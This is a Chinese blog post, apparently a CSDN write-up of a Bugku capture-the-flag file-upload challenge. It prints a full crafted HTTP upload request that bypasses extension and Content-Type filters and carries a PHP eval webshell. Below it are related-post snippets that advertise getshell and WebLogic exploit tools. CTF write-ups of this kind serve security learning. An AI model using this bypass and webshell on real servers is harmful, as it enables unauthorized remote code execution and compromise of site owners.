bugku-求getshell

最新推荐文章于 2023-02-09 11:33:45 发布
最新推荐文章于 2023-02-09 11:33:45 发布
阅读量731 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576390
版权

原题链接

http://120.24.86.145:8002/web9/

分析

上传题:
一共三个过滤

  • 请求头部的 Content-Type
  • 文件后缀
  • 请求数据的Content-Type

这里是黑名单过滤来判断文件后缀,依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写)
最终发现,php5可以绕过

接下来,请求数据的Content-Type字段改为 image/jpeg

但是一开始没注意到,上面还有一个请求头Content-Type字段,大小写绕过: mULtipart/form-data;

最终修改后的数据包为:

POST /web9/index.php HTTP/1.1
Host: 120.24.86.145:8002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://120.24.86.145:8002/web9/index.php
Content-Type: mULtipart/form-data;  boundary=---------------------------4827543632391   #修改大小写绕过
Content-Length: 319
Cookie: PHPSESSID=ediihlqlvkd342nl97k5i7s1e4jjfcgh
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------4827543632391
Content-Disposition: form-data; name="file"; filename="vv.php5"     #php5文件后缀没有过滤
Content-Type: image/jpeg        #文件格式修改为图片形式

<?php
eval(@_POST["vv"]);
?>
-----------------------------4827543632391
Content-Disposition: form-data; name="submit"

Submit
-----------------------------4827543632391--

flag

KEY{bb35dc123820e}

知识点

上传漏洞,过滤

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracleshell执行新医保数据转换后台
viviliving的专栏
03-20 239
select LinxRUNCMD('/data05/sql/exec.sh /data05/sql/test.sql') cmd from dual; exec.sh #!/usr/bin/bash source ~/.bash_profile echo $1 date>$1.log /usr/bin/nohup /u01/app/oracle/product/12.1.0/db_1/bin/sqlplus hsa_lzjbsi/hsa_lzjbsi@192.168.217.192/OR.
bugku getshell
wssmiss的博客
07-23 404
题目 分析 典型的文件上传漏洞 上传php图片马 上传成功! 保存路径是http://123.206.87.240:8002/web9/upload/20190719162955_303.jpg 用菜刀发现一直连不上 可能是后台直接删掉了,此路不通 参考大佬们的wp后发现此题本意是 1、扩展名filename 2、filename下面一行的Content-Type:image/jpeg 3、最...
批量getshell教程+工具
07-28
批量getshell教程+工具
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4128
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
SQL注入-getshell
热门推荐
LJH1999ZN的博客
02-15 1万+
一、getshell的含义 1.什么是shellShell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3691
网站Getshell的方法
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
Bugku-Web-cookie欺骗.docx
05-16
a = s.get(url, params=payload).content content = str(a, encoding="utf-8") print(content) ``` 在上面的示例中,攻击者可以通过构造 Cookie 来读取keys.php文件,并且可以通过设置 filename 参数来控制读取...
Weblogic:Weblogic CVE-2019-2725 CVE-2019-2729 Getshell命令执行
03-11
weblogic CVE-2019-2725 CVE-2019-2729 POC执行命令并回显usage:单个目标python3 weblogic_get_webshell.py http://url批量目标,将批量url放入url_list.txtpython3 weblogic_get_webshell.py all
2019-新闻原getshell.rar
09-26
标题中的“2019-新闻原getshell.rar”表明这是一个关于2019年针对新闻源网站的getshell工具的压缩文件。Getshell通常指的是在Web安全领域中,攻击者通过利用网站漏洞获取服务器的命令执行权限,从而能够上传webshell...
wordpress-getshell
06-05
Wordpress GetShell - 公共版 使用有效的用户名和密码组合,下面的脚本演示了如何自动植入 PHP shell 示例用法 %> perl wp-getshell.pl http://ubuntu64/wordpress admin admin [+] Logged in, replacing cookies ...
BugKu CTF(web篇)--文件上传
Nailaoyyds的博客
04-26 2647
题解 这个是后端绕过,跟前端差不多,前端更简单一些,只需要抓包在burp改然后放包就好 这是一个上传的上传口,上传一个一句话木马试一下(php类型) 放到burp重放器里查看, My name is margin,give me a image file not a php 它要是的图像,不是php 但是你的目的就是绕过后端过滤,传上它限制的php格式,然后连上他的后台 上传了一个图片马,它显示是上传成功的,他上传上去以后会自动改名字 ......
2023最火批量getshell工具
dcdmer1211的博客
02-09 1381
2023黑帽批量getshell,是一款快速方便进行webshell扫描的工具,不同于以前的getshell批量工具,它根据内置常见的exp漏洞、市面较的50多种exp,更好的检测网站漏洞、只要网站存在内置的exp漏洞,皆可通杀出来、且扫到的shell%99.9都是可以连接使用和一手的,这就方便我们更好的检测网站是否存在漏洞!
【每天学一点新知识】getshell???webshell???
RexHa的博客
10-08 4240
getshell就是可以通过某种漏洞达到留下后门的操作,可以通过程序的bug进入后台。 往往应用于上传一句话木马,然后利用菜刀、蚁剑等工具连接一句话在对方服务器的绝对路径,然后获得服务器的各个盘符的信息。
Bugku:web getshell
qq_26961571的博客
09-09 995
打开这道题,getshell表示的是get shellshell则为脚本的意思。 ​ 打开链接。 发现是一个网页可以上传文件,那么就是文件上传漏洞。 源代码也是不出所料的没有任何东西。 看来是真的要上传一个文件了,试了一下上传一个jpg格式文件,成功!!不过没有用啊,什么东西都没有显示出来。 查了一下资料: webshell就是以php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或...
bugku学习之36.getshell(文件上传漏洞+一句话木马)重要!
s11show_163的博客
03-01 924
速去回顾之前写的四种文件上传漏洞的利用: https://blog.csdn.net/s11show_163/article/details/104548642 本题考察文件上传漏洞加一句话木马(内含三个绕过,十分重要) 首先写一个一句话木马 开启代理,打开burpsuit ,上传.php文件 抓包 (可能需要多抓几次哦~ 因为有时候可能抓不到呢~ ) 一共三个过滤 请头部的 Con...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2294
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
getshell思路
Bu2n的博客
02-23 5709
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
kubectl-node_shell 怎么使用
最新发布
08-09
其中 `<节点名称>` 是要与之交互的节点的名称,可以通过运行 `kubectl get nodes` 命令来获取节点列表。 3. 如果要在容器中进行调试,可以使用 `--container` 参数指定要调试的容器名称。例如: ``` kubectl alpha...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值